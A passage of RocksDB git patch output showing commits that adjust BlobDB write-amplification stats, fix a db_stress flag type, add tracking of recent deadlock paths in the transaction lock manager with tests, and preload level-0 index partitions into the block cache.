whole write amp calculation doesn't seem to be correct and it is not being exposed. Will work on it later. Test Plan: Change kWriteAmplificationStatsPeriodMillisecs to 1000 (1 second) and run db_bench --use_blob_db for 5 minutes. Closes https://github.com/facebook/rocksdb/pull/2751 Differential Revision: D5648269 Pulled By: yiwu-arbug fbshipit-source-id: b843d9a09bb5f9e1b713d101ec7b87e54b5115a4 --- utilities/blob_db/blob_db_impl.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 06350b896e3..bbae53c0ebb 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1615,12 +1615,13 @@ std::pair<bool, double> BlobDBImpl::ReclaimOpenFiles(bool aborted) { return std::make_pair(true, -1); } +// TODO(yiwu): correct the stats and expose it.
std::pair<bool, double> BlobDBImpl::WaStats(bool aborted) { if (aborted) return std::make_pair(false, -1); WriteLock wl(&mutex_); - if (all_periods_write_.size() < kWriteAmplificationStatsPeriods) { + if (all_periods_write_.size() >= kWriteAmplificationStatsPeriods) { total_periods_write_ -= (*all_periods_write_.begin()); total_periods_ampl_ = (*all_periods_ampl_.begin()); From c1384a707637187be3b65386816078270b8943f6 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 17 Aug 2017 17:53:45 -0700 Subject: [PATCH 126/205] fix db_stress uint64_t to int32 cast Summary: Clang complains about a cast from uint64_t to int32 in db_stress. Fixing it. Closes https://github.com/facebook/rocksdb/pull/2755 Differential Revision: D5655947 Pulled By: yiwu-arbug fbshipit-source-id: cfac10e796e0adfef4727090b50975b0d6e2c9be --- tools/db_stress.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/db_stress.cc b/tools/db_stress.cc index 7a4837f18e6..86776cf9737 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -328,7 +328,7 @@ extern std::vector rocksdb_kill_prefix_blacklist; DEFINE_bool(disable_wal, false, "If true, do not write WAL for write."); -DEFINE_int32(target_file_size_base, rocksdb::Options().target_file_size_base, +DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base, "Target level-1 file size for compaction"); DEFINE_int32(target_file_size_multiplier, 1, From bddd5d3630694a6abecec02050d7d5bf55189c64 Mon Sep 17 00:00:00 2001 From: Archit Mishra Date: Thu, 17 Aug 2017 18:49:30 -0700 Subject: [PATCH 127/205] Added mechanism to track deadlock chain Summary: Changes: * extended the wait_txn_map to track additional information * designed circular buffer to store n latest deadlocks' information * added test coverage to verify the additional information tracked is accurately stored in the buffer Closes https://github.com/facebook/rocksdb/pull/2630 Differential Revision: D5478025 Pulled By: armishra fbshipit-source-id: 2b138de7b5a73f5ca554fc3ff8220a3be49f39e7 --- include/rocksdb/utilities/transaction_db.h | 27 +++ .../pessimistic_transaction_db.cc | 10 ++ .../transactions/pessimistic_transaction_db.h | 4 + .../transactions/transaction_lock_mgr.cc | 101 ++++++++++- utilities/transactions/transaction_lock_mgr.h | 33 +++- utilities/transactions/transaction_test.cc | 167 +++++++++++++++++- 6 files changed, 329 insertions(+), 13 deletions(-) diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index a61234adcc2..7a592c4f6cf 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -29,6 +29,8 @@ enum TxnDBWritePolicy { WRITE_UNPREPARED // write data before the prepare phase of 2pc }; +const uint32_t kInitialMaxDeadlocks = 5; + struct TransactionDBOptions { // Specifies the maximum number of keys that can be locked at the same time // per column family. // If this value is not positive, no limit will be enforced.
int64_t max_num_locks = -1; + // Stores the number of latest deadlocks to track + uint32_t max_num_deadlocks = kInitialMaxDeadlocks; + // Increasing this value will increase the concurrency by dividing the lock // table (per column family) into more sub-tables, each with their own // separate @@ -123,6 +128,26 @@ struct KeyLockInfo { bool exclusive; }; +struct DeadlockInfo { + TransactionID m_txn_id; + uint32_t m_cf_id; + std::string m_waiting_key; + bool m_exclusive; +}; + +struct DeadlockPath { + std::vector<DeadlockInfo> path; + bool limit_exceeded; + + explicit DeadlockPath(std::vector<DeadlockInfo> path_entry) + : path(path_entry), limit_exceeded(false) {} + + // empty path, limit exceeded constructor and default constructor + explicit DeadlockPath(bool limit = false) : path(0), limit_exceeded(limit) {} + + bool empty() { return path.empty() && !limit_exceeded; } +}; + class TransactionDB : public StackableDB { public: // Open a TransactionDB similar to DB::Open(). @@ -181,6 +206,8 @@ class TransactionDB : public StackableDB { // The mapping is column family id -> KeyLockInfo virtual std::unordered_multimap<uint32_t, KeyLockInfo> GetLockStatusData() = 0; + virtual std::vector<DeadlockPath> GetDeadlockInfoBuffer() = 0; + virtual void SetDeadlockInfoBufferSize(uint32_t target_size) = 0; protected: // To Create an TransactionDB, call Open() diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 08b0dfa7ba4..5304340543a 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -28,6 +28,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( db_impl_(static_cast_with_check<DBImpl, DB>(db)), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, + txn_db_options_.max_num_deadlocks, txn_db_options_.custom_mutex_factory ? txn_db_options_.custom_mutex_factory : std::shared_ptr( @@ -57,6 +58,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( db_impl_(static_cast_with_check<DBImpl, DB>(db->GetRootDB())), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, + txn_db_options_.max_num_deadlocks, txn_db_options_.custom_mutex_factory ?
txn_db_options_.custom_mutex_factory : std::shared_ptr( @@ -486,6 +488,14 @@ PessimisticTransactionDB::GetLockStatusData() { return lock_mgr_.GetLockStatusData(); } +std::vector<DeadlockPath> PessimisticTransactionDB::GetDeadlockInfoBuffer() { + return lock_mgr_.GetDeadlockInfoBuffer(); +} + +void PessimisticTransactionDB::SetDeadlockInfoBufferSize(uint32_t target_size) { + lock_mgr_.Resize(target_size); +} + void PessimisticTransactionDB::RegisterTransaction(Transaction* txn) { assert(txn); assert(txn->GetName().length() > 0); diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 35c2a014330..4d1a5f4b511 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -100,6 +100,10 @@ class PessimisticTransactionDB : public TransactionDB { void GetAllPreparedTransactions(std::vector<Transaction*>* trans) override; TransactionLockMgr::LockStatusData GetLockStatusData() override; + + std::vector<DeadlockPath> GetDeadlockInfoBuffer() override; + void SetDeadlockInfoBufferSize(uint32_t target_size) override; + struct CommitEntry { uint64_t prep_seq; uint64_t commit_seq; diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 9b7a4e640d9..a72c2a12ffb 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -96,6 +96,64 @@ struct LockMap { size_t GetStripe(const std::string& key) const; }; +void DeadlockInfoBuffer::AddNewPath(DeadlockPath path) { + std::lock_guard<std::mutex> lock(paths_buffer_mutex_); + + if (paths_buffer_.empty()) { + return; + } + + paths_buffer_[buffer_idx_] = path; + buffer_idx_ = (buffer_idx_ + 1) % paths_buffer_.size(); +} + +void DeadlockInfoBuffer::Resize(uint32_t target_size) { + std::lock_guard<std::mutex> lock(paths_buffer_mutex_); + + paths_buffer_ = Normalize(); + + // Drop the deadlocks that will no longer be needed after the normalize + if (target_size < paths_buffer_.size()) { + paths_buffer_.erase( + paths_buffer_.begin(), + paths_buffer_.begin() + (paths_buffer_.size() - target_size)); + buffer_idx_ = 0; + } + // Resize the buffer to the target size and restore the buffer's idx + else { + auto prev_size = paths_buffer_.size(); + paths_buffer_.resize(target_size); + buffer_idx_ = (uint32_t)prev_size; + } +} + +std::vector<DeadlockPath> DeadlockInfoBuffer::Normalize() { + auto working = paths_buffer_; + + if (working.empty()) { + return working; + } + + // Next write occurs at a nonexistent path's slot + if (paths_buffer_[buffer_idx_].empty()) { + working.resize(buffer_idx_); + } else { + std::rotate(working.begin(), working.begin() + buffer_idx_, working.end()); + } + + return working; +} + +std::vector<DeadlockPath> DeadlockInfoBuffer::PrepareBuffer() { + std::lock_guard<std::mutex> lock(paths_buffer_mutex_); + + // Reversing the normalized vector returns the latest deadlocks first + auto working = Normalize(); + std::reverse(working.begin(), working.end()); + + return working; +} + namespace { void UnrefLockMapsCache(void* ptr) { // Called when a thread exits or a ThreadLocalPtr gets destroyed.
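Taken together, AddNewPath(), Resize(), Normalize(), and PrepareBuffer() implement a small ring buffer holding the most recent deadlock paths. A minimal consumer-side sketch of the API this exposes follows; the dump helper is illustrative and not part of the patch, and it assumes an already-opened rocksdb::TransactionDB* and that TransactionID is a 64-bit integer:

```
#include <cinttypes>
#include <cstdio>
#include <vector>

#include "rocksdb/utilities/transaction_db.h"

// Hedged sketch: walk the latest recorded deadlock cycles, newest first,
// as returned by DeadlockInfoBuffer::PrepareBuffer() above.
void DumpRecentDeadlocks(rocksdb::TransactionDB* txn_db) {
  std::vector<rocksdb::DeadlockPath> paths = txn_db->GetDeadlockInfoBuffer();
  for (const auto& path : paths) {
    if (path.limit_exceeded) {
      printf("cycle exceeded the deadlock detection depth\n");
      continue;
    }
    for (const auto& node : path.path) {
      printf("txn %" PRIu64 " waits on cf %" PRIu32 " key %s (%s)\n",
             node.m_txn_id, node.m_cf_id, node.m_waiting_key.c_str(),
             node.m_exclusive ? "exclusive" : "shared");
    }
  }
}
```

Resizing through SetDeadlockInfoBufferSize() funnels into Resize() above, which normalizes the ring first so that shrinking preserves the most recent entries.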
@@ -107,11 +165,13 @@ void UnrefLockMapsCache(void* ptr) { TransactionLockMgr::TransactionLockMgr( TransactionDB* txn_db, size_t default_num_stripes, int64_t max_num_locks, + uint32_t max_num_deadlocks, std::shared_ptr<TransactionDBMutexFactory> mutex_factory) : txn_db_impl_(nullptr), default_num_stripes_(default_num_stripes), max_num_locks_(max_num_locks), lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)), + dlock_buffer_(max_num_deadlocks), mutex_factory_(mutex_factory) { assert(txn_db); txn_db_impl_ = @@ -309,7 +369,8 @@ Status TransactionLockMgr::AcquireWithTimeout( // detection. if (wait_ids.size() != 0) { if (txn->IsDeadlockDetect()) { - if (IncrementWaiters(txn, wait_ids)) { + if (IncrementWaiters(txn, wait_ids, key, column_family_id, + lock_info.exclusive)) { result = Status::Busy(Status::SubCode::kDeadlock); stripe->stripe_mutex->UnLock(); return result; @@ -380,12 +441,15 @@ void TransactionLockMgr::DecrementWaitersImpl( bool TransactionLockMgr::IncrementWaiters( const PessimisticTransaction* txn, - const autovector<TransactionID>& wait_ids) { + const autovector<TransactionID>& wait_ids, const std::string& key, + const uint32_t& cf_id, const bool& exclusive) { auto id = txn->GetID(); - std::vector<TransactionID> queue(txn->GetDeadlockDetectDepth()); + std::vector<int> queue_parents(txn->GetDeadlockDetectDepth()); + std::vector<TransactionID> queue_values(txn->GetDeadlockDetectDepth()); std::lock_guard<std::mutex> lock(wait_txn_map_mutex_); assert(!wait_txn_map_.Contains(id)); - wait_txn_map_.Insert(id, wait_ids); + + wait_txn_map_.Insert(id, {wait_ids, cf_id, key, exclusive}); for (auto wait_id : wait_ids) { if (rev_wait_txn_map_.Contains(wait_id)) { @@ -401,13 +465,15 @@ bool TransactionLockMgr::IncrementWaiters( } const auto* next_ids = &wait_ids; + int parent = -1; for (int tail = 0, head = 0; head < txn->GetDeadlockDetectDepth(); head++) { int i = 0; if (next_ids) { for (; i < static_cast<int>(next_ids->size()) && tail + i < txn->GetDeadlockDetectDepth(); i++) { - queue[tail + i] = (*next_ids)[i]; + queue_values[tail + i] = (*next_ids)[i]; + queue_parents[tail + i] = parent; } tail += i; } @@ -417,19 +483,33 @@ return false; } - auto next = queue[head]; + auto next = queue_values[head]; if (next == id) { + std::vector<DeadlockInfo> path; + while (head != -1) { + assert(wait_txn_map_.Contains(queue_values[head])); + + auto extracted_info = wait_txn_map_.Get(queue_values[head]); + path.push_back({queue_values[head], extracted_info.m_cf_id, + extracted_info.m_waiting_key, + extracted_info.m_exclusive}); + head = queue_parents[head]; + } + std::reverse(path.begin(), path.end()); + dlock_buffer_.AddNewPath(DeadlockPath(path)); DecrementWaitersImpl(txn, wait_ids); return true; } else if (!wait_txn_map_.Contains(next)) { next_ids = nullptr; continue; } else { - next_ids = &wait_txn_map_.Get(next); + parent = head; + next_ids = &(wait_txn_map_.Get(next).m_neighbors); } } // Wait cycle too big, just assume deadlock.
+ dlock_buffer_.AddNewPath(DeadlockPath(true)); DecrementWaitersImpl(txn, wait_ids); return true; } @@ -650,6 +730,13 @@ TransactionLockMgr::LockStatusData TransactionLockMgr::GetLockStatusData() { return data; } +std::vector<DeadlockPath> TransactionLockMgr::GetDeadlockInfoBuffer() { + return dlock_buffer_.PrepareBuffer(); +} + +void TransactionLockMgr::Resize(uint32_t target_size) { + dlock_buffer_.Resize(target_size); +} } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6e542071c15..abf7c5d3d71 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -26,13 +26,35 @@ struct LockInfo; struct LockMap; struct LockMapStripe; +struct DeadlockInfoBuffer { + private: + std::vector<DeadlockPath> paths_buffer_; + uint32_t buffer_idx_; + std::mutex paths_buffer_mutex_; + std::vector<DeadlockPath> Normalize(); + + public: + explicit DeadlockInfoBuffer(uint32_t n_latest_dlocks) + : paths_buffer_(n_latest_dlocks), buffer_idx_(0) {} + void AddNewPath(DeadlockPath path); + void Resize(uint32_t target_size); + std::vector<DeadlockPath> PrepareBuffer(); +}; + +struct TrackedTrxInfo { + autovector<TransactionID> m_neighbors; + uint32_t m_cf_id; + std::string m_waiting_key; + bool m_exclusive; +}; + class Slice; class PessimisticTransactionDB; class TransactionLockMgr { public: TransactionLockMgr(TransactionDB* txn_db, size_t default_num_stripes, - int64_t max_num_locks, + int64_t max_num_locks, uint32_t max_num_deadlocks, std::shared_ptr<TransactionDBMutexFactory> factory); ~TransactionLockMgr(); @@ -59,6 +81,8 @@ class TransactionLockMgr { using LockStatusData = std::unordered_multimap<uint32_t, KeyLockInfo>; LockStatusData GetLockStatusData(); + std::vector<DeadlockPath> GetDeadlockInfoBuffer(); + void Resize(uint32_t); private: PessimisticTransactionDB* txn_db_impl_; @@ -92,7 +116,8 @@ class TransactionLockMgr { // Maps from waitee -> number of waiters. HashMap<TransactionID, int> rev_wait_txn_map_; // Maps from waiter -> waitee. - HashMap<TransactionID, autovector<TransactionID>> wait_txn_map_; + HashMap<TransactionID, TrackedTrxInfo> wait_txn_map_; + DeadlockInfoBuffer dlock_buffer_; // Used to allocate mutexes/condvars to use when locking keys std::shared_ptr<TransactionDBMutexFactory> mutex_factory_; @@ -116,7 +141,9 @@ class TransactionLockMgr { LockMapStripe* stripe, LockMap* lock_map, Env* env); bool IncrementWaiters(const PessimisticTransaction* txn, - const autovector<TransactionID>& wait_ids); + const autovector<TransactionID>& wait_ids, + const std::string& key, const uint32_t& cf_id, + const bool& exclusive); void DecrementWaiters(const PessimisticTransaction* txn, const autovector<TransactionID>& wait_ids); void DecrementWaitersImpl(const PessimisticTransaction* txn, diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 148f1c41c24..0eaaf20acb6 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -462,6 +462,37 @@ TEST_P(TransactionTest, DeadlockCycleShared) { auto s = txns[i]->GetForUpdate(read_options, "0", nullptr, true /* exclusive */); ASSERT_TRUE(s.IsDeadlock()); + + // Calculate next buffer len, plateau at 5 when 5 records are inserted. + const uint32_t curr_dlock_buffer_len_ = + (i - 14 > kInitialMaxDeadlocks) ? kInitialMaxDeadlocks : (i - 14); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer.size(), curr_dlock_buffer_len_); + auto dlock_entry = dlock_buffer[0].path; + ASSERT_EQ(dlock_entry.size(), kInitialMaxDeadlocks); + + int64_t curr_waiting_key = 0; + + // Offset of each txn id from the root of the shared dlock tree's txn id.
+ int64_t offset_root = dlock_entry[0].m_txn_id - 1; + // Offset of the final entry in the dlock path from the root's txn id. + TransactionID leaf_id = + dlock_entry[dlock_entry.size() - 1].m_txn_id - offset_root; + + for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) { + auto dl_node = *it; + ASSERT_EQ(dl_node.m_txn_id, offset_root + leaf_id); + ASSERT_EQ(dl_node.m_cf_id, 0); + ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key)); + ASSERT_EQ(dl_node.m_exclusive, true); + + if (curr_waiting_key == 0) { + curr_waiting_key = leaf_id; + } + curr_waiting_key /= 2; + leaf_id /= 2; + } } // Rollback the leaf transaction. @@ -473,6 +504,102 @@ for (auto& t : threads) { t.join(); } + + // Downsize the buffer and verify the 3 latest deadlocks are preserved. + auto dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(3); + auto dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 3); + + for (uint32_t i = 0; i < dlock_buffer_after_resize.size(); i++) { + for (uint32_t j = 0; j < dlock_buffer_after_resize[i].path.size(); j++) { + ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id, + dlock_buffer_before_resize[i].path[j].m_txn_id); + } + } + + // Upsize the buffer and verify the 3 latest deadlocks are preserved. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(5); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 3); + + for (uint32_t i = 0; i < dlock_buffer_before_resize.size(); i++) { + for (uint32_t j = 0; j < dlock_buffer_before_resize[i].path.size(); j++) { + ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id, + dlock_buffer_before_resize[i].path[j].m_txn_id); + } + } + + // Downsize to 0 and verify the size is consistent. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(0); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 0); + + // Upsize from 0 to verify the size is persistent. + dlock_buffer_before_resize = db->GetDeadlockInfoBuffer(); + db->SetDeadlockInfoBufferSize(3); + dlock_buffer_after_resize = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer_after_resize.size(), 0); + + // Contrived case of shared lock of cycle size 2 to verify that a shared + // lock causing a deadlock is correctly reported as "shared" in the buffer. + std::vector<Transaction*> txns_shared(2); + + // Create a cycle of size 2. + for (uint32_t i = 0; i < 2; i++) { + txns_shared[i] = db->BeginTransaction(write_options, txn_options); + ASSERT_TRUE(txns_shared[i]); + auto s = txns_shared[i]->GetForUpdate(read_options, ToString(i), nullptr); + ASSERT_OK(s); + } + + std::atomic<uint32_t> checkpoints_shared(0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", + [&](void* arg) { checkpoints_shared.fetch_add(1); }); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + std::vector<port::Thread> threads_shared; + for (uint32_t i = 0; i < 1; i++) { + std::function<void()> blocking_thread = [&, i] { + auto s = + txns_shared[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); + ASSERT_OK(s); + txns_shared[i]->Rollback(); + delete txns_shared[i]; + }; + threads_shared.emplace_back(blocking_thread); + } + + // Wait until all threads are waiting on each other.
+ while (checkpoints_shared.load() != 1) { + /* sleep override */ + std::this_thread::sleep_for(std::chrono::milliseconds(100)); + } + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks(); + + // Complete the cycle T2 -> T1 with a shared lock. + auto s = txns_shared[1]->GetForUpdate(read_options, "0", nullptr, false); + ASSERT_TRUE(s.IsDeadlock()); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + + // Verify the size of the buffer and the single path. + ASSERT_EQ(dlock_buffer.size(), 1); + ASSERT_EQ(dlock_buffer[0].path.size(), 2); + + // Verify the exclusivity field of the transactions in the deadlock path. + ASSERT_TRUE(dlock_buffer[0].path[0].m_exclusive); + ASSERT_FALSE(dlock_buffer[0].path[1].m_exclusive); + txns_shared[1]->Rollback(); + delete txns_shared[1]; + + for (auto& t : threads_shared) { + t.join(); + } } TEST_P(TransactionTest, DeadlockCycle) { @@ -480,7 +607,8 @@ TEST_P(TransactionTest, DeadlockCycle) { ReadOptions read_options; TransactionOptions txn_options; - const uint32_t kMaxCycleLength = 50; + // offset by 2 from the max depth to test edge case + const uint32_t kMaxCycleLength = 52; txn_options.lock_timeout = 1000000; txn_options.deadlock_detect = true; @@ -489,6 +617,7 @@ // Set up a long wait for chain like this: // // T1 -> T2 -> T3 -> ... -> Tlen + std::vector<Transaction*> txns(len); for (uint32_t i = 0; i < len; i++) { @@ -509,8 +638,7 @@ std::vector<port::Thread> threads; for (uint32_t i = 0; i < len - 1; i++) { std::function<void()> blocking_thread = [&, i] { - auto s = - txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); + auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr); ASSERT_OK(s); txns[i]->Rollback(); delete txns[i]; @@ -530,6 +658,39 @@ auto s = txns[len - 1]->GetForUpdate(read_options, "0", nullptr); ASSERT_TRUE(s.IsDeadlock()); + const uint32_t dlock_buffer_size_ = (len - 1 > 5) ? 5 : (len - 1); + uint32_t curr_waiting_key = 0; + TransactionID curr_txn_id = txns[0]->GetID(); + + auto dlock_buffer = db->GetDeadlockInfoBuffer(); + ASSERT_EQ(dlock_buffer.size(), dlock_buffer_size_); + uint32_t check_len = len; + bool check_limit_flag = false; + + // Special case for a deadlock path that exceeds the maximum depth. + if (len > 50) { + check_len = 0; + check_limit_flag = true; + } + auto dlock_entry = dlock_buffer[0].path; + ASSERT_EQ(dlock_entry.size(), check_len); + ASSERT_EQ(dlock_buffer[0].limit_exceeded, check_limit_flag); + + // Iterates backwards over path verifying decreasing txn_ids. + for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) { + auto dl_node = *it; + ASSERT_EQ(dl_node.m_txn_id, len + curr_txn_id - 1); + ASSERT_EQ(dl_node.m_cf_id, 0); + ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key)); + ASSERT_EQ(dl_node.m_exclusive, true); + + curr_txn_id--; + if (curr_waiting_key == 0) { + curr_waiting_key = len; + } + curr_waiting_key--; + } + // Rollback the last transaction. txns[len - 1]->Rollback(); delete txns[len - 1]; From 1efc600ddfa4a8bf4cf042343d7a20199dfd76e5 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 18 Aug 2017 10:53:03 -0700 Subject: [PATCH 128/205] Preload l0 index partitions Summary: This fixes the existing logic for pinning l0 index partitions. The patch preloads the partitions into block cache and pins them if they belong to level 0 and pin_l0 is set.
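For reference, a minimal configuration sketch that reaches this pinning path follows; the option names are from the public BlockBasedTableOptions API, while the cache size and other values are purely illustrative:

```
#include "rocksdb/cache.h"
#include "rocksdb/options.h"
#include "rocksdb/table.h"

// Hedged sketch: a partitioned (two-level) index with L0 index and filter
// partitions pinned in the block cache, the case the preloading targets.
rocksdb::Options MakePartitionedIndexOptions() {
  rocksdb::BlockBasedTableOptions table_options;
  table_options.index_type =
      rocksdb::BlockBasedTableOptions::kTwoLevelIndexSearch;
  table_options.cache_index_and_filter_blocks = true;
  // The "pin_l0" flag referred to in the summary.
  table_options.pin_l0_filter_and_index_blocks_in_cache = true;
  table_options.block_cache = rocksdb::NewLRUCache(128 << 20);  // illustrative

  rocksdb::Options options;
  options.table_factory.reset(
      rocksdb::NewBlockBasedTableFactory(table_options));
  return options;
}
```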
The drawback is that it does many small IOs when preloading all the partitions into the cache if direct io is enabled. Working on a solution for that. Closes https://github.com/facebook/rocksdb/pull/2661 Differential Revision: D5554010 Pulled By: maysamyabandeh fbshipit-source-id: 1e6f32a3524d71355c77d4138516dcfb601ca7b2 --- HISTORY.md | 2 + include/rocksdb/version.h | 2 +- table/block_based_table_reader.cc | 174 +++++++++++++++++++----------- table/block_based_table_reader.h | 18 ++-- table/table_test.cc | 2 +- 5 files changed, 128 insertions(+), 70 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index fc6c55874db..a07337055ab 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,5 +1,7 @@ # Rocksdb Change Log ## Unreleased + +## 5.7.8 (08/14/2017) ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index fb920cf2e7e..dd11ea7e8e5 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -5,7 +5,7 @@ #pragma once #define ROCKSDB_MAJOR 5 -#define ROCKSDB_MINOR 7 +#define ROCKSDB_MINOR 8 #define ROCKSDB_PATCH 0 // Do not use these. We made the mistake of declaring macros starting with diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 89e0c735490..7e236e8bfff 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -186,23 +186,87 @@ class PartitionIndexReader : public IndexReader, public Cleanable { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; - Cleanable* block_cache_cleaner = nullptr; - const bool pin_cached_indexes = - level_ == 0 && - table_->rep_->table_options.pin_l0_filter_and_index_blocks_in_cache; - if (pin_cached_indexes) { - // Keep partition indexes into the cache as long as the partition index - // reader object is alive - block_cache_cleaner = this; - } return NewTwoLevelIterator( new BlockBasedTable::BlockEntryIteratorState( table_, ReadOptions(), icomparator_, skip_filters, is_index, - block_cache_cleaner), + partition_map_.size() ? &partition_map_ : nullptr), index_block_->NewIterator(icomparator_, nullptr, true)); // TODO(myabandeh): Update TwoLevelIterator to be able to make use of - // on-stack - // BlockIter while the state is on heap + // on-stack BlockIter while the state is on heap. Currently it assumes + // the first level iter is always on heap and will attempt to delete it + // in its destructor. + } + + virtual void CacheDependencies(bool pin) override { + // Before read partitions, prefetch them to avoid lots of IOs + auto rep = table_->rep_; + BlockIter biter; + BlockHandle handle; + index_block_->NewIterator(icomparator_, &biter, true); + // Index partitions are assumed to be consecutive. Prefetch them all.
+ // Read the first block offset + biter.SeekToFirst(); + Slice input = biter.value(); + Status s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read first index partition"); + return; + } + uint64_t prefetch_off = handle.offset(); + + // Read the last block's offset + biter.SeekToLast(); + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read last index partition"); + return; + } + uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize; + uint64_t prefetch_len = last_off - prefetch_off; + std::unique_ptr<FilePrefetchBuffer> prefetch_buffer; + auto& file = table_->rep_->file; + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + + // After prefetch, read the partitions one by one + biter.SeekToFirst(); + auto ro = ReadOptions(); + Cache* block_cache = rep->table_options.block_cache.get(); + for (; biter.Valid(); biter.Next()) { + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read index partition"); + continue; + } + + BlockBasedTable::CachableEntry<Block> block; + Slice compression_dict; + if (rep->compression_dict_block) { + compression_dict = rep->compression_dict_block->data; + } + const bool is_index = true; + s = table_->MaybeLoadDataBlockToCache(prefetch_buffer.get(), rep, ro, + handle, compression_dict, &block, + is_index); + + if (s.ok() && block.value != nullptr) { + assert(block.cache_handle != nullptr); + if (pin) { + partition_map_[handle.offset()] = block; + RegisterCleanup(&ReleaseCachedEntry, block_cache, block.cache_handle); + } else { + block_cache->Release(block.cache_handle); + } + } + } } virtual size_t size() const override { return index_block_->size(); } @@ -222,13 +286,12 @@ class PartitionIndexReader : public IndexReader, public Cleanable { const int level) : IndexReader(icomparator, stats), table_(table), - index_block_(std::move(index_block)), - level_(level) { + index_block_(std::move(index_block)) { assert(index_block_ != nullptr); } BlockBasedTable* table_; std::unique_ptr<Block> index_block_; - int level_; + std::map<uint64_t, CachableEntry<Block>> partition_map_; }; // Index that allows binary search lookup for the first key of each block. @@ -708,10 +771,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, } else { if (found_range_del_block && !rep->range_del_handle.IsNull()) { ReadOptions read_options; - // TODO: try to use prefetched buffer too.
